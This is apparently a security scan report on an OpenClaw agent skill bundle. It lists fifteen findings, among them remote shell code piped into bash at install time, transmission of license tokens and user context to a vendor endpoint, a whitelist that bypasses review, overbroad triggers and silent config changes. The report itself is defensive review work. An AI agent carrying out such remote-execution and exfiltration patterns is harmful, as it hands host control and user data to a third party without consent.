Openclaw Guardian

Security checks across malware telemetry and agentic risk

Overview

This paid OpenClaw guardian bundle has a coherent purpose, but installation delegates execution to opaque server-delivered shell code and makes persistent trust/configuration changes that need human review.

Install only if you trust both the publisher and skill.socialmore.net to supply code at install time. Prefer a signed, version-pinned bundle you can inspect before execution, review any allowBundled and route/config changes, avoid passing secrets or private paths to remote prompt execution, and test in an isolated OpenClaw profile before using it on a real environment.

SkillSpector

By NVIDIA

Vulnerability Patterns

Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands

Findings (15)

Context-Inappropriate Capability

High

Confidence: 95% confidence
Finding: The file is presented as a payment/license SDK, but it also includes `oc_prompt_skill`, which sends a license token and caller-supplied context to a remote `/api/skill/execute` endpoint for server-side execution. That expands the trust boundary beyond license verification into remote processing of user data, creating an undocumented exfiltration and remote-execution capability that operators may not expect from an auth helper.

Intent-Code Divergence

Medium

Confidence: 91% confidence
Finding: The comment says AI runs on the server and results return locally, but the implementation also serializes arbitrary `key=value` arguments into JSON and transmits them as `context`. This can leak local file paths, prompts, identifiers, or other sensitive operator-supplied data to the vendor service without prominent disclosure at the call site.

Intent-Code Divergence

Medium

Confidence: 95% confidence
Finding: The skill declares that Step 0-5 must never be skipped once triggered, but later introduces a whitelist path that bypasses the mandatory security review for certain packages. This creates a trust-based exception that attackers can exploit through package impersonation, author spoofing, or compromise of a supposedly trusted package, undermining the core safety guarantee the skill claims to enforce.

Vague Triggers

Medium

Confidence: 87% confidence
Finding: The trigger conditions are broad enough to activate on ordinary requests about stability, rollback, repair, or context compression, which can cause the skill to run in situations the user did not explicitly intend. In a skill that leads to shell-based installation and system modification, overbroad activation materially increases the chance of unsafe or surprise execution paths.

Vague Triggers

Medium

Confidence: 88% confidence
Finding: The manifest trigger phrases include generic terms such as '全能守护', '稳定性套件', and '运维套件', making accidental invocation more likely during normal admin conversations. Since the skill's primary action is to fetch and run a shell script from a remote server, ambiguous triggers expand exposure to risky behavior without clear user consent.

Missing User Warnings

Medium

Confidence: 98% confidence
Finding: The installation command pipes execution through bash using a remotely supplied script URL, but the documentation provides no warning, verification step, or description of system effects. This is dangerous because it enables immediate arbitrary code execution from the network, making compromise of the server, path, or script contents directly equivalent to compromise of the host.

Missing User Warnings

Medium

Confidence: 90% confidence
Finding: `oc_execute_skill` decrypts server-fetched content and pipes it directly into `bash`, meaning the remote server effectively controls code execution on the local machine. Because there is no clear warning or confirmation at the execution point, users may invoke it as a normal SDK helper without realizing it executes remotely delivered shell code.

Missing User Warnings

Medium

Confidence: 89% confidence
Finding: The server-side prompt execution path posts both the license token and user-supplied context to a remote endpoint without an explicit runtime disclosure. In an agent setting, operators may assume a local helper is being used, while sensitive inputs are actually transmitted off-host to a third party.

Natural-Language Policy Violations

Medium

Confidence: 84% confidence
Finding: The SDK queries a remote endpoint with `Accept-Language` and relies on IP-derived region detection to select a payment method by default, without prior opt-in. While not direct code execution, it unnecessarily discloses locale metadata and makes behavior depend on network-observed geography, which is privacy-invasive and can steer payment flows without transparent consent.

Missing User Warnings

Medium

Confidence: 91% confidence
Finding: The skill explicitly describes automatic rollback and file-system-watch-triggered handling of configuration changes, but it does not provide a prominent warning that user files may be modified automatically. In a config-management skill targeting files under ~/.openclaw/, undocumented automatic writes increase the risk of surprising state changes, unintended rollback of legitimate edits, and hard-to-audit behavior.

Missing User Warnings

Medium

Confidence: 94% confidence
Finding: The alerting matrix references Telegram and Signal notifications for configuration-related failures, but there is no privacy notice describing what data may be sent to external services. Because config events can contain filenames, paths, diffs, health details, or other operational metadata, this creates a real risk of unintended data disclosure to third-party channels.

Vague Triggers

Medium

Confidence: 86% confidence
Finding: The trigger phrases are broad enough that ordinary user requests about installing or reviewing a skill may automatically invoke this workflow, including installation and later configuration changes. Overbroad triggering increases the chance of unintended execution of sensitive actions and makes social engineering easier because a casual phrase can activate a privileged install path.

Missing User Warnings

Medium

Confidence: 90% confidence
Finding: The skill includes commands that back up and then modify the user's local OpenClaw configuration by writing to allowBundled, but the document does not prominently warn that local configuration state will be changed. This can weaken user awareness and consent around persistence-related changes, especially because allowlisting may reduce future scrutiny of the installed skill.

Missing User Warnings

Medium

Confidence: 92% confidence
Finding: The script recursively rewrites installed Python files in place with no dry-run mode, confirmation prompt, backup, or scoping safeguards beyond a caller-supplied target path. This can unexpectedly alter code under a user-provided directory, create integrity and maintenance problems, and make rollback difficult if the wrong path is supplied or if the tool is used in automation.

Missing User Warnings

Medium

Confidence: 95% confidence
Finding: The watermark embeds a user identifier such as an email or username@hostname directly into source files, which may then be redistributed, committed, or exposed through support bundles and package archives. That creates a privacy leak and persistent attribution marker without any built-in notice, minimization, or consent mechanism.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal